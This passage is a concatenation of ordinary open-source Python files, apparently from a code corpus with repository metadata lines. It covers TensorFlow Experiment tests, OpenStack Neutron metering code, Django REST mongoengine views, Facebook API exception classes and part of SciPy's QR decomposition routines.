def test_train_server_does_not_start_with_empty_master(self, mock_server):
config = tf.contrib.learn.RunConfig(
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']}
),
master='',)
ex = tf.contrib.learn.Experiment(TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
no_job_name = tf.contrib.learn.RunConfig(
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']},
),
task=1,
master='host3:2222', # Normally selected by job_name
)
with self.assertRaises(ValueError):
ex = tf.contrib.learn.Experiment(TestEstimator(no_job_name),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(1, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_evaluate_delay(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
for delay in [0, 1, 3]:
start = time.time()
ex.evaluate(delay_secs=delay)
duration = time.time() - start
tf.logging.info('eval duration (expected %f): %f', delay, duration)
self.assertAlmostEqual(duration, delay, delta=0.5)
def test_continuous_eval(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(StopIteration, ex.continuous_eval)
self.assertEquals(6, est.eval_count)
self.assertEquals(0, est.fit_count)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
ex = tf.contrib.learn.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
start = time.time()
self.assertRaises(StopIteration, ex.continuous_eval)
duration = time.time() - start
expected = 5 * delay
tf.logging.info('eval duration (expected %f): %f', expected, duration)
self.assertAlmostEqual(duration, expected, delta=0.5)
def test_run_local(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0],
tf.contrib.learn.monitors.ValidationMonitor))
def test_train_and_evaluate(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
train_steps=100,
eval_steps=100)
ex.train_and_evaluate()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertTrue(isinstance(est.monitors[0],
tf.contrib.learn.monitors.ValidationMonitor))
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_run_std_server(self, mock_server):
# Arrange.
config = tf.contrib.learn.RunConfig(
master='host2:2222',
cluster_spec=tf.train.ClusterSpec(
{'ps': ['host1:2222', 'host2:2222'],
'worker': ['host3:2222', 'host4:2222', 'host5:2222']}
),
job_name='ps',
task=1,
num_cores=15,
gpu_memory_fraction=0.314,
)
est = TestEstimator(config)
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
# Act.
ex.run_std_server()
# Assert.
mock_server.assert_has_calls([tf.test.mock.call().start(),
tf.test.mock.call().join()])
@tf.test.mock.patch('tensorflow.python.training.server_lib.Server') # pylint: disable=line-too-long
def test_run_std_server_raises_without_cluster_spec(self, mock_server):
config = tf.contrib.learn.RunConfig(master='host4:2222')
with self.assertRaises(ValueError):
ex = tf.contrib.learn.Experiment(TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.run_std_server()
def test_test(self):
est = TestEstimator()
ex = tf.contrib.learn.Experiment(est,
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.test()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
if __name__ == '__main__':
tf.test.main()
|
vijayendrabvs/hap
|
refs/heads/master
|
neutron/plugins/mlnx/common/constants.py
|
11
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
LOCAL_VLAN_ID = -2
FLAT_VLAN_ID = -1
# Values for physical network_type
TYPE_IB = 'ib'
TYPE_ETH = 'eth'
VIF_TYPE_DIRECT = 'mlnx_direct'
VIF_TYPE_HOSTDEV = 'hostdev'
VNIC_TYPE = 'vnic_type'
|
pombredanne/django-rest-framework-mongoengine
|
refs/heads/master
|
rest_framework_mongoengine/generics.py
|
5
|
from rest_framework import mixins
from rest_framework import generics as drf_generics
from mongoengine.queryset.base import BaseQuerySet
class GenericAPIView(drf_generics.GenericAPIView):
"""
View to play nice with our Document Serializer
"""
lookup_field = 'id'
def get_queryset(self):
"""
Re evaluate queryset, fixes #63
"""
queryset = super(GenericAPIView, self).get_queryset()
if isinstance(queryset, BaseQuerySet):
queryset = queryset.all()
return queryset
def get_object(self):
"""
*** Inherited from DRF 3 GenericAPIView, swapped get_object_or_404() with similar logic for mongoengine ***
Returns the object the view is displaying.
You may want to override this if you need to provide non-standard
queryset lookups. Eg if objects are referenced using multiple
keyword arguments in the url conf.
"""
queryset = self.filter_queryset(self.get_queryset())
# Perform the lookup filtering.
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
assert lookup_url_kwarg in self.kwargs, (
'Expected view %s to be called with a URL keyword argument '
'named "%s". Fix your URL conf, or set the `.lookup_field` '
'attribute on the view correctly.' %
(self.__class__.__name__, lookup_url_kwarg)
)
filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
try:
obj = queryset.get(**filter_kwargs)
except (queryset._document.DoesNotExist, ValidationError):
from django.http import Http404
raise Http404('No %s matches the given query.' % queryset._document._class_name)
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
class CreateAPIView(mixins.CreateModelMixin,
GenericAPIView):
"""
Concrete view for creating a model instance.
"""
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class ListAPIView(mixins.ListModelMixin,
GenericAPIView):
"""
Concrete view for listing a queryset.
"""
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class ListCreateAPIView(mixins.ListModelMixin,
mixins.CreateModelMixin,
GenericAPIView):
"""
Concrete view for listing a queryset or creating a model instance.
"""
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
class RetrieveAPIView(mixins.RetrieveModelMixin,
GenericAPIView):
"""
Concrete view for retrieving a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
class UpdateAPIView(mixins.UpdateModelMixin,
GenericAPIView):
"""
Concrete view for updating a model instance.
"""
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class RetrieveUpdateAPIView(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
GenericAPIView):
"""
Concrete view for retrieving, updating a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
class RetrieveDestroyAPIView(mixins.RetrieveModelMixin,
mixins.DestroyModelMixin,
GenericAPIView):
"""
Concrete view for retrieving or deleting a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
class RetrieveUpdateDestroyAPIView(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
GenericAPIView):
"""
Concrete view for retrieving, updating or deleting a model instance.
"""
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
|
fnouama/intellij-community
|
refs/heads/master
|
python/testData/quickFixes/PyAddPropertyForFieldQuickFixTest/protectedMember_after.py
|
80
|
class A:
def __init__(self):
self._x = 1
def _foo(self):
print(self._x)
@property
def x(self):
return self._x
a = A()
a._foo()
print(a.x)
|
noelbk/neutron-juniper
|
refs/heads/master
|
neutron/services/metering/agents/metering_agent.py
|
13
|
# Copyright (C) 2013 eNovance SAS <licensing@enovance.com>
#
# Author: Sylvain Afchain <sylvain.afchain@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import eventlet
from oslo.config import cfg
from neutron.agent.common import config
from neutron.agent import rpc as agent_rpc
from neutron.common import constants as constants
from neutron.common import topics
from neutron.common import utils
from neutron import context
from neutron import manager
from neutron.openstack.common import importutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import loopingcall
from neutron.openstack.common.notifier import api as notifier_api
from neutron.openstack.common import periodic_task
from neutron.openstack.common.rpc import proxy
from neutron.openstack.common import service
from neutron import service as neutron_service
LOG = logging.getLogger(__name__)
class MeteringPluginRpc(proxy.RpcProxy):
BASE_RPC_API_VERSION = '1.0'
def __init__(self, host):
super(MeteringPluginRpc,
self).__init__(topic=topics.METERING_AGENT,
default_version=self.BASE_RPC_API_VERSION)
def _get_sync_data_metering(self, context):
try:
return self.call(context,
self.make_msg('get_sync_data_metering',
host=self.host),
topic=topics.METERING_PLUGIN)
except Exception:
LOG.exception(_("Failed synchronizing routers"))
class MeteringAgent(MeteringPluginRpc, manager.Manager):
Opts = [
cfg.StrOpt('driver',
default='neutron.services.metering.drivers.noop.'
'noop_driver.NoopMeteringDriver',
help=_("Metering driver")),
cfg.IntOpt('measure_interval', default=30,
help=_("Interval between two metering measures")),
cfg.IntOpt('report_interval', default=300,
help=_("Interval between two metering reports")),
]
def __init__(self, host, conf=None):
self.conf = conf or cfg.CONF
self._load_drivers()
self.root_helper = config.get_root_helper(self.conf)
self.context = context.get_admin_context_without_session()
self.metering_info = {}
self.metering_loop = loopingcall.FixedIntervalLoopingCall(
self._metering_loop
)
measure_interval = self.conf.measure_interval
self.last_report = 0
self.metering_loop.start(interval=measure_interval)
self.host = host
self.label_tenant_id = {}
self.routers = {}
self.metering_infos = {}
super(MeteringAgent, self).__init__(host=self.conf.host)
def _load_drivers(self):
"""Loads plugin-driver from configuration."""
LOG.info(_("Loading Metering driver %s"), self.conf.driver)
if not self.conf.driver:
raise SystemExit(_('A metering driver must be specified'))
self.metering_driver = importutils.import_object(
self.conf.driver, self, self.conf)
def _metering_notification(self):
for label_id, info in self.metering_infos.items():
data = {'label_id': label_id,
'tenant_id': self.label_tenant_id.get(label_id),
'pkts': info['pkts'],
'bytes': info['bytes'],
'time': info['time'],
'first_update': info['first_update'],
'last_update': info['last_update'],
'host': self.host}
LOG.debug(_("Send metering report: %s"), data)
notifier_api.notify(self.context,
notifier_api.publisher_id('metering'),
'l3.meter',
notifier_api.CONF.default_notification_level,
data)
info['pkts'] = 0
info['bytes'] = 0
info['time'] = 0
def _purge_metering_info(self):
ts = int(time.time())
report_interval = self.conf.report_interval
for label_id, info in self.metering_info.items():
if info['last_update'] > ts + report_interval:
del self.metering_info[label_id]
def _add_metering_info(self, label_id, pkts, bytes):
ts = int(time.time())
info = self.metering_infos.get(label_id, {'bytes': 0,
'pkts': 0,
'time': 0,
'first_update': ts,
'last_update': ts})
info['bytes'] += bytes
info['pkts'] += pkts
info['time'] += ts - info['last_update']
info['last_update'] = ts
self.metering_infos[label_id] = info
return info
def _add_metering_infos(self):
self.label_tenant_id = {}
for router in self.routers.values():
tenant_id = router['tenant_id']
labels = router.get(constants.METERING_LABEL_KEY, [])
for label in labels:
label_id = label['id']
self.label_tenant_id[label_id] = tenant_id
tenant_id = self.label_tenant_id.get
accs = self._get_traffic_counters(self.context, self.routers.values())
if not accs:
return
for label_id, acc in accs.items():
self._add_metering_info(label_id, acc['pkts'], acc['bytes'])
def _metering_loop(self):
self._add_metering_infos()
ts = int(time.time())
delta = ts - self.last_report
report_interval = self.conf.report_interval
if delta > report_interval:
self._metering_notification()
self._purge_metering_info()
self.last_report = ts
@utils.synchronized('metering-agent')
def _invoke_driver(self, context, meterings, func_name):
try:
return getattr(self.metering_driver, func_name)(context, meterings)
except AttributeError:
LOG.exception(_("Driver %(driver)s does not implement %(func)s"),
{'driver': self.conf.driver,
'func': func_name})
except RuntimeError:
LOG.exception(_("Driver %(driver)s:%(func)s runtime error"),
{'driver': self.conf.driver,
'func': func_name})
@periodic_task.periodic_task(run_immediately=True)
def _sync_routers_task(self, context):
routers = self._get_sync_data_metering(self.context)
if not routers:
return
self._update_routers(context, routers)
def router_deleted(self, context, router_id):
self._add_metering_infos()
if router_id in self.routers:
del self.routers[router_id]
return self._invoke_driver(context, router_id,
'remove_router')
def routers_updated(self, context, routers=None):
if not routers:
routers = self._get_sync_data_metering(self.context)
if not routers:
return
self._update_routers(context, routers)
def _update_routers(self, context, routers):
for router in routers:
self.routers[router['id']] = router
return self._invoke_driver(context, routers,
'update_routers')
def _get_traffic_counters(self, context, routers):
LOG.debug(_("Get router traffic counters"))
return self._invoke_driver(context, routers, 'get_traffic_counters')
def update_metering_label_rules(self, context, routers):
LOG.debug(_("Update metering rules from agent"))
return self._invoke_driver(context, routers,
'update_metering_label_rules')
def add_metering_label(self, context, routers):
LOG.debug(_("Creating a metering label from agent"))
return self._invoke_driver(context, routers,
'add_metering_label')
def remove_metering_label(self, context, routers):
self._add_metering_infos()
LOG.debug(_("Delete a metering label from agent"))
return self._invoke_driver(context, routers,
'remove_metering_label')
class MeteringAgentWithStateReport(MeteringAgent):
def __init__(self, host, conf=None):
super(MeteringAgentWithStateReport, self).__init__(host=host,
conf=conf)
self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN)
self.agent_state = {
'binary': 'neutron-metering-agent',
'host': host,
'topic': topics.METERING_AGENT,
'configurations': {
'metering_driver': self.conf.driver,
'measure_interval':
self.conf.measure_interval,
'report_interval': self.conf.report_interval
},
'start_flag': True,
'agent_type': constants.AGENT_TYPE_METERING}
report_interval = cfg.CONF.AGENT.report_interval
self.use_call = True
if report_interval:
self.heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
self.heartbeat.start(interval=report_interval)
def _report_state(self):
try:
self.state_rpc.report_state(self.context, self.agent_state,
self.use_call)
self.agent_state.pop('start_flag', None)
self.use_call = False
except AttributeError:
# This means the server does not support report_state
LOG.warn(_("Neutron server does not support state report."
" State report for this agent will be disabled."))
self.heartbeat.stop()
return
except Exception:
LOG.exception(_("Failed reporting state!"))
def agent_updated(self, context, payload):
LOG.info(_("agent_updated by server side %s!"), payload)
def main():
eventlet.monkey_patch()
conf = cfg.CONF
conf.register_opts(MeteringAgent.Opts)
config.register_agent_state_opts_helper(conf)
config.register_root_helper(conf)
conf(project='neutron')
config.setup_logging(conf)
server = neutron_service.Service.create(
binary='neutron-metering-agent',
topic=topics.METERING_AGENT,
report_interval=cfg.CONF.AGENT.report_interval,
manager='neutron.services.metering.agents.'
'metering_agent.MeteringAgentWithStateReport')
service.launch(server).wait()
|
fire855/android_external_skia
|
refs/heads/cm-12.1-mt6592
|
gm/rebaseline_server/compare_to_expectations_test.py
|
68
|
#!/usr/bin/python
"""
Copyright 2013 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Test compare_to_expectations.py
TODO(epoger): Create a command to update the expected results (in
self._output_dir_expected) when appropriate. For now, you should:
1. examine the results in self._output_dir_actual and make sure they are ok
2. rm -rf self._output_dir_expected
3. mv self._output_dir_actual self._output_dir_expected
Although, if you're using an SVN checkout, this will blow away .svn directories
within self._output_dir_expected, which wouldn't be good...
"""
import os
import sys
# Imports from within Skia
import base_unittest
import compare_to_expectations
import results
import gm_json # must import results first, so that gm_json will be in sys.path
class CompareToExpectationsTest(base_unittest.TestCase):
def test_gm(self):
"""Process results of a GM run with the ExpectationComparisons object."""
results_obj = compare_to_expectations.ExpectationComparisons(
actuals_root=os.path.join(self._input_dir, 'gm-actuals'),
expected_root=os.path.join(self._input_dir, 'gm-expectations'),
generated_images_root=self._temp_dir,
diff_base_url='/static/generated-images')
results_obj.get_timestamp = mock_get_timestamp
gm_json.WriteToFile(
results_obj.get_packaged_results_of_type(
results.KEY__HEADER__RESULTS_ALL),
os.path.join(self._output_dir_actual, 'gm.json'))
def mock_get_timestamp():
"""Mock version of BaseComparisons.get_timestamp() for testing."""
return 12345678
def main():
base_unittest.main(CompareToExpectationsTest)
if __name__ == '__main__':
main()
|
JPWKU/unix-agent
|
refs/heads/master
|
src/dcm/agent/__init__.py
|
3
|
#
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import pkg_resources
g_version = pkg_resources.require("dcm-agent")[0].version
g_protocol_version = 104
def get_root_location():
return os.path.abspath(os.path.dirname(__file__))
|
abendleiter/Django-facebook
|
refs/heads/master
|
open_facebook/exceptions.py
|
1
|
'''
Facebook error classes also see
http://fbdevwiki.com/wiki/Error_codes#User_Permission_Errors
'''
import ssl
try:
# python 2 imports
from urllib.error import HTTPError, URLError
except ImportError:
# python 3 imports
from urllib.error import HTTPError, URLError
class OpenFacebookException(Exception):
'''
BaseClass for all open facebook errors
'''
@classmethod
def codes_list(cls):
'''
Returns the codes as a list of instructions
'''
if hasattr(cls, 'codes'):
codes_list = [cls.codes]
if isinstance(cls.codes, list):
codes_list = cls.codes
return codes_list
@classmethod
def range(cls):
'''
Returns for how many codes this Exception, matches with the eventual
goal of matching an error to the most specific error class
'''
range = 0
codes_list = cls.codes_list()
for c in codes_list:
if isinstance(c, tuple):
start, stop = c
range += stop - start + 1
else:
range += 1
# make sure none specific exceptions are last in the order
if not range:
range = 1000
return range
class ParameterException(OpenFacebookException):
'''
100-189
190 and up are oauth errors
'''
codes = (100, 189)
class UnknownException(OpenFacebookException):
'''
Raised when facebook themselves don't know what went wrong
'''
codes = 1
class OAuthException(OpenFacebookException):
pass
class PermissionException(OAuthException):
'''
200-300
'''
codes = [3, (200, 299)]
class UserPermissionException(PermissionException):
codes = (300, 399)
class FeedActionLimit(UserPermissionException):
'''
When you posted too many times from one user acount
'''
codes = 341
class OpenGraphException(OpenFacebookException):
'''
Raised when we get error 3502, representing a problem with facebook
open graph data on the page
'''
codes = 3502
class DuplicateStatusMessage(OpenFacebookException):
codes = 506
class MissingParameter(OpenFacebookException):
pass
class AliasException(OpenFacebookException):
'''
When you send a request to a non existant url facebook gives this error
instead of a 404....
'''
codes = 803
class UnsupportedDeleteRequest(OpenFacebookException):
pass
class ParseException(OpenFacebookException):
'''
Anything preventing us from parsing the Facebook response
'''
pass
class FacebookUnreachable(OpenFacebookException):
'''
Timeouts, 500s, SSL errors etc
'''
pass
class FacebookSSLError(FacebookUnreachable, ssl.SSLError):
pass
class FacebookHTTPError(FacebookUnreachable, HTTPError):
pass
class FacebookURLError(FacebookUnreachable, URLError):
pass
def map_unreachable_exception(e):
'''
We always raise the original and new subclass to
- preserve backwards compatibility
'''
exception_class = FacebookUnreachable
if isinstance(e, ssl.SSLError):
exception_class = FacebookSSLError
elif isinstance(e, HTTPError):
exception_class = FacebookHTTPError
elif isinstance(e, URLError):
exception_class = FacebookURLError
return exception_class
def convert_unreachable_exception(e, error_format='Facebook is unreachable %s'):
'''
Converts an SSLError, HTTPError or URLError into something subclassing
FacebookUnreachable allowing code to easily try except this
'''
exception_class = map_unreachable_exception(e)
error_message = error_format % str(e)
exception = exception_class(error_message)
return exception
def get_exception_classes():
from open_facebook import exceptions as facebook_exceptions
all_exceptions = dir(facebook_exceptions)
classes = [getattr(facebook_exceptions, e, None) for e in all_exceptions]
exception_classes = [e for e in classes if getattr(
e, 'codes', None) and issubclass(
e, OpenFacebookException)]
return exception_classes
|
obi-two/Rebelion
|
refs/heads/master
|
data/scripts/templates/object/tangible/mission/quest_item/shared_brennis_doore_q1_needed.py
|
2
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/mission/quest_item/shared_brennis_doore_q1_needed.iff"
result.attribute_template_id = -1
result.stfName("loot_nboo_n","brennis_doore_q1_needed")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
vberaudi/scipy
|
refs/heads/master
|
scipy/linalg/decomp_qr.py
|
82
|
"""QR decomposition functions."""
from __future__ import division, print_function, absolute_import
import numpy
# Local imports
from .lapack import get_lapack_funcs
from .misc import _datacopied
__all__ = ['qr', 'qr_multiply', 'rq']
def safecall(f, name, *args, **kwargs):
"""Call a LAPACK routine, determining lwork automatically and handling
error return values"""
lwork = kwargs.get("lwork", None)
if lwork in (None, -1):
kwargs['lwork'] = -1
ret = f(*args, **kwargs)
kwargs['lwork'] = ret[-2][0].real.astype(numpy.int)
ret = f(*args, **kwargs)
if ret[-1] < 0:
raise ValueError("illegal value in %d-th argument of internal %s"
% (-ret[-1], name))
return ret[:-2]
def qr(a, overwrite_a=False, lwork=None, mode='full', pivoting=False,
check_finite=True):
"""
Compute QR decomposition of a matrix.
Calculate the decomposition ``A = Q R`` where Q is unitary/orthogonal
and R upper triangular.
Parameters
----------
a : (M, N) array_like
Matrix to be decomposed
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
lwork : int, optional
Work array size, lwork >= a.shape[1]. If None or -1, an optimal size
is computed.
mode : {'full', 'r', 'economic', 'raw'}, optional
Determines what information is to be returned: either both Q and R
('full', default), only R ('r') or both Q and R but computed in
economy-size ('economic', see Notes). The final option 'raw'
(added in Scipy 0.11) makes the function return two matrices
(Q, TAU) in the internal format used by LAPACK.
pivoting : bool, optional
Whether or not factorization should include pivoting for rank-revealing
qr decomposition. If pivoting, compute the decomposition
``A P = Q R`` as above, but where P is chosen such that the diagonal
of R is non-increasing.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
Q : float or complex ndarray
Of shape (M, M), or (M, K) for ``mode='economic'``. Not returned
if ``mode='r'``.
R : float or complex ndarray
Of shape (M, N), or (K, N) for ``mode='economic'``. ``K = min(M, N)``.
P : int ndarray
Of shape (N,) for ``pivoting=True``. Not returned if
``pivoting=False``.
Raises
------
LinAlgError
Raised if decomposition fails
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dorgqr, zungqr, dgeqp3, and zgeqp3.
If ``mode=economic``, the shapes of Q and R are (M, K) and (K, N) instead
of (M,M) and (M,N), with ``K=min(M,N)``.
Examples
--------
>>> from scipy import random, linalg, dot, diag, all, allclose
>>> a = random.randn(9, 6)
>>> q, r = linalg.qr(a)
>>> allclose(a, np.dot(q, r))
True
>>> q.shape, r.shape
((9, 9), (9, 6))
>>> r2 = linalg.qr(a, mode='r')
>>> allclose(r, r2)
True
>>> q3, r3 = linalg.qr(a, mode='economic')
>>> q3.shape, r3.shape
((9, 6), (6, 6))
>>> q4, r4, p4 = linalg.qr(a, pivoting=True)
>>> d = abs(diag(r4))
>>> all(d[1:] <= d[:-1])
True
>>> allclose(a[:, p4], dot(q4, r4))
True
>>> q4.shape, r4.shape, p4.shape
((9, 9), (9, 6), (6,))
>>> q5, r5, p5 = linalg.qr(a, mode='economic', pivoting=True)
>>> q5.shape, r5.shape, p5.shape
((9, 6), (6, 6), (6,))
"""
# 'qr' was the old default, equivalent to 'full'. Neither 'full' nor
# 'qr' are used below.
# 'raw' is used internally by qr_multiply
if mode not in ['full', 'qr', 'r', 'economic', 'raw']:
raise ValueError(
"Mode argument should be one of ['full', 'r', 'economic', 'raw']")
if check_finite:
a1 = numpy.asarray_chkfinite(a)
else:
a1 = numpy.asarray(a)
if len(a1.shape) != 2:
raise ValueError("expected 2D array")
M, N = a1.shape
overwrite_a = overwrite_a or (_datacopied(a1, a))
if pivoting:
geqp3, = get_lapack_funcs(('geqp3',), (a1,))
qr, jpvt, tau = safecall(geqp3, "geqp3", a1, overwrite_a=overwrite_a)
jpvt -= 1 # geqp3 returns a 1-based index array, so subtract 1
else:
geqrf, = get_lapack_funcs(('geqrf',), (a1,))
qr, tau = safecall(geqrf, "geqrf", a1, lwork=lwork,
overwrite_a=overwrite_a)
if mode not in ['economic', 'raw'] or M < N:
R = numpy.triu(qr)
else:
R = numpy.triu(qr[:N, :])
if pivoting:
Rj = R, jpvt
else:
Rj = R,
if mode == 'r':
return Rj
elif mode == 'raw':
return ((qr, tau),) + Rj
gor_un_gqr, = get_lapack_funcs(('orgqr',), (qr,))
if M < N:
Q, = safecall(gor_un_gqr, "gorgqr/gungqr", qr[:, :M], tau,
lwork=lwork, overwrite_a=1)
elif mode == 'economic':
Q, = safecall(gor_un_gqr, "gorgqr/gungqr", qr, tau, lwork=lwork,
overwrite_a=1)
else:
t = qr.dtype.char
qqr = numpy.empty((M, M), dtype=t)
qqr[:, :N] = qr
Q, = safecall(gor_un_gqr, "gorgqr/gungqr", qqr, tau, lwork=lwork,
overwrite_a=1)
return (Q,) + Rj
def qr_multiply(a, c, mode='right', pivoting=False, conjugate=False,
overwrite_a=False, overwrite_c=False):
"""
Calculate the QR decomposition and multiply Q with a matrix.
Calculate the decomposition ``A = Q R`` where Q is unitary/orthogonal
and R upper triangular. Multiply Q with a vector or a matrix c.
Parameters
----------
a : array_like, shape (M, N)
Matrix to be decomposed
c : array_like, one- or two-dimensional
calculate the product of c and q, depending on the mode:
mode : {'left', 'right'}, optional
``dot(Q, c)`` is returned if mode is 'left',
``dot(c, Q)`` is returned if mode is 'right'.
The shape of c must be appropriate for the matrix multiplications,
if mode is 'left', ``min(a.shape) == c.shape[0]``,
if mode is 'right', ``a.shape[0] == c.shape[1]``.
pivoting : bool, optional
Whether or not factorization should include pivoting for rank-revealing
qr decomposition, see the documentation of qr.
conjugate : bool, optional
Whether Q should be complex-conjugated. This might be faster
than explicit conjugation.
overwrite_a : bool, optional
Whether data in a is overwritten (may improve performance)
overwrite_c : bool, optional
Whether data in c is overwritten (may improve performance).
If this is used, c must be big enough to keep the result,
i.e. c.shape[0] = a.shape[0] if mode is 'left'.
Returns
-------
CQ : float or complex ndarray
the product of Q and c, as defined in mode
R : float or complex ndarray
Of shape (K, N), ``K = min(M, N)``.
P : ndarray of ints
Of shape (N,) for ``pivoting=True``.
Not returned if ``pivoting=False``.
Raises
------
LinAlgError
Raised if decomposition fails
Notes
-----
This is an interface to the LAPACK routines dgeqrf, zgeqrf,
dormqr, zunmqr, dgeqp3, and zgeqp3.
.. versionadded:: 0.11.0
"""
if mode not in ['left', 'right']:
raise ValueError("Mode argument should be one of ['left', 'right']")
c = numpy.asarray_chkfinite(c)
onedim = c.ndim == 1
if onedim:
c = c.reshape(1, len(c))
if mode == "left":
c = c.T
a = numpy.asarray(a) # chkfinite done in qr
M, N = a.shape
if not (mode == "left" and
(not overwrite_c and min(M, N) == c.shape[0] or
overwrite_c and M == c.shape[0]) or
mode == "right" and M == c.shape[1]):
raise ValueError("objects are not aligned")
raw = qr(a, overwrite_a, None, "raw", pivoting)
Q, tau = raw[0]
gor_un_mqr, = get_lapack_funcs(('ormqr',), (Q,))
if gor_un_mqr.typecode in ('s', 'd'):
trans = "T"
else:
trans = "C"
Q = Q[:, :min(M, N)]
if M > N and mode == "left" and not overwrite_c:
if conjugate:
cc = numpy.zeros((c.shape[1], M), dtype=c.dtype, order="F")
cc[:, :N] = c.T
else:
cc = numpy.zeros((M, c.shape[1]), dtype=c.dtype, order="F")
cc[:N, :] = c
trans = "N"
if conjugate:
lr = "R"
else:
lr = "L"
overwrite_c = True
elif c.flags["C_CONTIGUOUS"] and trans == "T" or conjugate:
cc = c.T
if mode == "left":
lr = "R"
else:
lr = "L"
else:
trans = "N"
cc = c
if mode == "left":
lr = "L"
else:
lr = "R"
